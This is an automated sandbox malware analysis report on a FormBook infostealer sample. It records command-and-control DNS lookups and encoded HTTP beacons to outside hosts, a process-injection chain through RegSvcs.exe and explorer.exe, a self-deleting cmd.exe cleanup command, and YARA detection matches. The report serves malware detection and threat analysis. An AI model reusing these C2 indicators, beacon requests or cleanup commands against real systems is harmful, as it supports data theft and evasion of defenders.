                                                                        Sep 27, 2021 17:40:24.798568010 CEST8.8.8.8192.168.2.70x4148Name error (3)www.iamstevekelsey.comnonenoneA (IP address)IN (0x0001)
                                                                        Sep 27, 2021 17:40:29.862195015 CEST8.8.8.8192.168.2.70x3762No error (0)www.ff4c3dgsp.xyzff4c3dgsp.xyzCNAME (Canonical name)IN (0x0001)
                                                                        Sep 27, 2021 17:40:29.862195015 CEST8.8.8.8192.168.2.70x3762No error (0)ff4c3dgsp.xyz23.225.139.107A (IP address)IN (0x0001)
                                                                        Sep 27, 2021 17:40:35.223239899 CEST8.8.8.8192.168.2.70x4a83No error (0)www.newhollandpurpose.comnewhollandpurpose.comCNAME (Canonical name)IN (0x0001)
                                                                        Sep 27, 2021 17:40:35.223239899 CEST8.8.8.8192.168.2.70x4a83No error (0)newhollandpurpose.com64.91.246.51A (IP address)IN (0x0001)
                                                                        Sep 27, 2021 17:40:40.558794975 CEST8.8.8.8192.168.2.70xa26fNo error (0)www.appleluis.hostappleluis.hostCNAME (Canonical name)IN (0x0001)
                                                                        Sep 27, 2021 17:40:45.590652943 CEST8.8.8.8192.168.2.70x140No error (0)www.adronesview.com91.195.240.94A (IP address)IN (0x0001)
                                                                        Sep 27, 2021 17:40:50.698527098 CEST8.8.8.8192.168.2.70x5b9fNo error (0)www.teelandcompany.comteelandcompany.comCNAME (Canonical name)IN (0x0001)
                                                                        Sep 27, 2021 17:40:50.698527098 CEST8.8.8.8192.168.2.70x5b9fNo error (0)teelandcompany.com34.102.136.180A (IP address)IN (0x0001)
                                                                        Sep 27, 2021 17:40:55.975321054 CEST8.8.8.8192.168.2.70xabc7No error (0)www.baila.madridparkingsrv0.dondominio.comCNAME (Canonical name)IN (0x0001)
                                                                        Sep 27, 2021 17:40:55.975321054 CEST8.8.8.8192.168.2.70xabc7No error (0)parkingsrv0.dondominio.com31.214.178.54A (IP address)IN (0x0001)
                                                                        Sep 27, 2021 17:41:01.124341011 CEST8.8.8.8192.168.2.70xdbc4Name error (3)www.snackithalal.comnonenoneA (IP address)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • www.gspotworld.com
                                                                        • www.yota.store
                                                                        • www.ff4c3dgsp.xyz
                                                                        • www.newhollandpurpose.com
                                                                        • www.adronesview.com
                                                                        • www.teelandcompany.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.74968435.215.165.2980C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Sep 27, 2021 17:40:08.986748934 CEST180OUTGET /rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=KdEc5zFmuggnLXnkala38KeRZUwGYpsmBda5bvOgbVa5jGbFYEbNRXOiQtYTCsFpD8+WwfyYDA== HTTP/1.1
                                                                        Host: www.gspotworld.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Sep 27, 2021 17:40:09.255940914 CEST180INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Mon, 27 Sep 2021 15:40:09 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 146
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.74968552.58.78.1680C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Sep 27, 2021 17:40:19.654385090 CEST181OUTGET /rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=vDEbv8rrDmkkiTshm4h8UJjCBA7dTpqpRs2jUd027mZ5NPASlMJS8wDm2zEWwRi0VbXM0fP6PA== HTTP/1.1
                                                                        Host: www.yota.store
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Sep 27, 2021 17:40:19.672382116 CEST182INHTTP/1.1 410 Gone
                                                                        Server: openresty
                                                                        Date: Mon, 27 Sep 2021 15:39:30 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 61 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 79 6f 74 61 2e 73 74 6f 72 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 36 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 79 6f 74 61 2e 73 74 6f 72 65 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 7<html>9 <head>4a <meta http-equiv='refresh' content='5; url=http://www.yota.store/' />a </head>9 <body>36 You are being redirected to http://www.yota.storea </body>8</html>0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.74968623.225.139.10780C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Sep 27, 2021 17:40:30.021119118 CEST183OUTGET /rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=sgGY6EHrU2/sPlFv65T/Wb7gB3GGagfeDoLJsp77UP3iiMN1AZE/7XMT6P9bXkgBT15arvy1nw== HTTP/1.1
                                                                        Host: www.ff4c3dgsp.xyz
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Sep 27, 2021 17:40:30.179701090 CEST183INHTTP/1.1 404 Not Found
                                                                        Date: Mon, 27 Sep 2021 15:40:29 GMT
                                                                        Server: Apache/2.4.46 (Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9a
                                                                        Content-Length: 196
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        3192.168.2.74968764.91.246.5180C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Sep 27, 2021 17:40:35.347867966 CEST184OUTGET /rgoe/?0N9=p62UTdjvvun5m4F6E/NDs8CkSXewz0Mmd3OAmKShvilGuUBo5ij0sMfMI9B7yPSR/U/saD/cPg==&n0DhB=j0DpGx9XxT-Tnhk HTTP/1.1
                                                                        Host: www.newhollandpurpose.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Sep 27, 2021 17:40:35.473385096 CEST185INHTTP/1.1 301 Moved Permanently
                                                                        Date: Mon, 27 Sep 2021 15:40:35 GMT
                                                                        Server: Apache
                                                                        Location: https://www.newhollandpurpose.com/rgoe/?0N9=p62UTdjvvun5m4F6E/NDs8CkSXewz0Mmd3OAmKShvilGuUBo5ij0sMfMI9B7yPSR/U/saD/cPg==&n0DhB=j0DpGx9XxT-Tnhk
                                                                        Cache-Control: max-age=600
                                                                        Expires: Mon, 27 Sep 2021 15:50:35 GMT
                                                                        Content-Length: 354
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 68 6f 6c 6c 61 6e 64 70 75 72 70 6f 73 65 2e 63 6f 6d 2f 72 67 6f 65 2f 3f 30 4e 39 3d 70 36 32 55 54 64 6a 76 76 75 6e 35 6d 34 46 36 45 2f 4e 44 73 38 43 6b 53 58 65 77 7a 30 4d 6d 64 33 4f 41 6d 4b 53 68 76 69 6c 47 75 55 42 6f 35 69 6a 30 73 4d 66 4d 49 39 42 37 79 50 53 52 2f 55 2f 73 61 44 2f 63 50 67 3d 3d 26 61 6d 70 3b 6e 30 44 68 42 3d 6a 30 44 70 47 78 39 58 78 54 2d 54 6e 68 6b 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newhollandpurpose.com/rgoe/?0N9=p62UTdjvvun5m4F6E/NDs8CkSXewz0Mmd3OAmKShvilGuUBo5ij0sMfMI9B7yPSR/U/saD/cPg==&amp;n0DhB=j0DpGx9XxT-Tnhk">here</a>.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        4192.168.2.74968891.195.240.9480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Sep 27, 2021 17:40:45.616533995 CEST186OUTGET /rgoe/?0N9=/t1+ewTNvP58zbN/GTmlHuihgocL7TvwecIdqR1o1yMMHUTs/zxhPcif7gHrks2EHupuL2PvCA==&n0DhB=j0DpGx9XxT-Tnhk HTTP/1.1
                                                                        Host: www.adronesview.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Sep 27, 2021 17:40:45.647933006 CEST187INHTTP/1.1 301 Moved Permanently
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Location: https://www.adronesview.com/rgoe/?0N9=/t1+ewTNvP58zbN/GTmlHuihgocL7TvwecIdqR1o1yMMHUTs/zxhPcif7gHrks2EHupuL2PvCA==&n0DhB=j0DpGx9XxT-Tnhk
                                                                        Date: Mon, 27 Sep 2021 15:40:45 GMT
                                                                        Content-Length: 175
                                                                        Connection: close
                                                                        Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 64 72 6f 6e 65 73 76 69 65 77 2e 63 6f 6d 2f 72 67 6f 65 2f 3f 30 4e 39 3d 2f 74 31 2b 65 77 54 4e 76 50 35 38 7a 62 4e 2f 47 54 6d 6c 48 75 69 68 67 6f 63 4c 37 54 76 77 65 63 49 64 71 52 31 6f 31 79 4d 4d 48 55 54 73 2f 7a 78 68 50 63 69 66 37 67 48 72 6b 73 32 45 48 75 70 75 4c 32 50 76 43 41 3d 3d 26 61 6d 70 3b 6e 30 44 68 42 3d 6a 30 44 70 47 78 39 58 78 54 2d 54 6e 68 6b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                                                        Data Ascii: <a href="https://www.adronesview.com/rgoe/?0N9=/t1+ewTNvP58zbN/GTmlHuihgocL7TvwecIdqR1o1yMMHUTs/zxhPcif7gHrks2EHupuL2PvCA==&amp;n0DhB=j0DpGx9XxT-Tnhk">Moved Permanently</a>.


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        5192.168.2.74968934.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Sep 27, 2021 17:40:50.713532925 CEST187OUTGET /rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mBDlN3bRVBdzT2BPw== HTTP/1.1
                                                                        Host: www.teelandcompany.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Sep 27, 2021 17:40:50.892046928 CEST188INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Mon, 27 Sep 2021 15:40:50 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "6151bfae-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Code Manipulations

                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        Analysis Process: SUPPLY_PRICE_ORDER_9978484DF.exe PID: 1892 Parent PID: 5552

                                                                        General

                                                                        Start time:17:38:49
                                                                        Start date:27/09/2021
                                                                        Path:C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exe'
                                                                        Imagebase:0xe50000
                                                                        File size:829440 bytes
                                                                        MD5 hash:42346AE289E050D44FE9C0BCFB5E84B0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.269111767.0000000004251000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.269111767.0000000004251000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.269111767.0000000004251000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.268187190.0000000003251000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.268283403.00000000032CF000.00000004.00000001.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        Chronological Activities

                                                                        Analysis Process: RegSvcs.exe PID: 2848 Parent PID: 1892

                                                                        General

                                                                        Start time:17:39:00
                                                                        Start date:27/09/2021
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Imagebase:0x2f0000
                                                                        File size:45152 bytes
                                                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Chronological Activities

                                                                        Analysis Process: RegSvcs.exe PID: 1112 Parent PID: 1892

                                                                        General

                                                                        Start time:17:39:00
                                                                        Start date:27/09/2021
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Imagebase:0x6b0000
                                                                        File size:45152 bytes
                                                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.330815984.0000000000B40000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.330815984.0000000000B40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.330815984.0000000000B40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.330932008.0000000000C60000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.330932008.0000000000C60000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.330932008.0000000000C60000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Chronological Activities

                                                                        Analysis Process: explorer.exe PID: 3292 Parent PID: 1112

                                                                        General

                                                                        Start time:17:39:02
                                                                        Start date:27/09/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                        Imagebase:0x7ff662bf0000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.300246548.000000000E040000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.300246548.000000000E040000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.300246548.000000000E040000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.320533115.000000000E040000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.320533115.000000000E040000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.320533115.000000000E040000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

                                                                        Chronological Activities

                                                                        Analysis Process: autoconv.exe PID: 6084 Parent PID: 3292

                                                                        General

                                                                        Start time:17:39:27
                                                                        Start date:27/09/2021
                                                                        Path:C:\Windows\SysWOW64\autoconv.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                                        Imagebase:0xb30000
                                                                        File size:851968 bytes
                                                                        MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Chronological Activities

                                                                        Analysis Process: colorcpl.exe PID: 5436 Parent PID: 3292

                                                                        General

                                                                        Start time:17:39:28
                                                                        Start date:27/09/2021
                                                                        Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                                        Imagebase:0x2f0000
                                                                        File size:86528 bytes
                                                                        MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.510129850.00000000025D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.510129850.00000000025D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.510129850.00000000025D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.509697209.00000000024A0000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.509697209.00000000024A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.509697209.00000000024A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group

                                                                        Chronological Activities

                                                                        Analysis Process: cmd.exe PID: 5504 Parent PID: 5436

                                                                        General

                                                                        Start time:17:39:32
                                                                        Start date:27/09/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                                        Imagebase:0x870000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Chronological Activities

                                                                        Analysis Process: conhost.exe PID: 5672 Parent PID: 5504

                                                                        General

                                                                        Start time:17:39:32
                                                                        Start date:27/09/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff774ee0000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Chronological Activities

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >

                                                                          Analysis Process: SUPPLY_PRICE_ORDER_9978484DF.exe PID: 1892 Parent PID: 5552 SUPPLY_PRICE_ORDER_9978484DF.exeCOMMON

                                                                          Executed Functions

                                                                          Function 0167B710, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 0167B770
                                                                          • GetCurrentThread.KERNEL32 ref: 0167B7AD
                                                                          • GetCurrentProcess.KERNEL32 ref: 0167B7EA
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0167B843
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267329997.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: 104b6de4ee6e4c58d86f6a9dc2be8ccf8bf40ed0662a6d47dc540aff672274d0
                                                                          • Instruction ID: ba02fb42304e19f824f472e4ecc25bc194164155ea4fd9a6dc11118ee0eee878
                                                                          • Opcode Fuzzy Hash: 104b6de4ee6e4c58d86f6a9dc2be8ccf8bf40ed0662a6d47dc540aff672274d0
                                                                          • Instruction Fuzzy Hash: 3C5165B09006488FDB14CFAAD948BEEBBF4FF49314F248469E419A7350D774A988CF65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01679410, Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 01679656
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.267329997.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: b3452e8ac638929dff9693cd8de18379062e9619cfb1cd616ddbeabceccf3f95
                                                                          • Instruction ID: 9f22708c2eb2654882140bcf5aad08c0285f46d4021c85ed1192ab3e0444d90d
                                                                          • Opcode Fuzzy Hash: b3452e8ac638929dff9693cd8de18379062e9619cfb1cd616ddbeabceccf3f95
                                                                          • Instruction Fuzzy Hash: 617113B0A00B058FE724DF6AD44479ABBF5BF89714F008A2ED58A97B40D734E945CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0167FD78, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0167FE8A
                                                                          Memory Dump Source
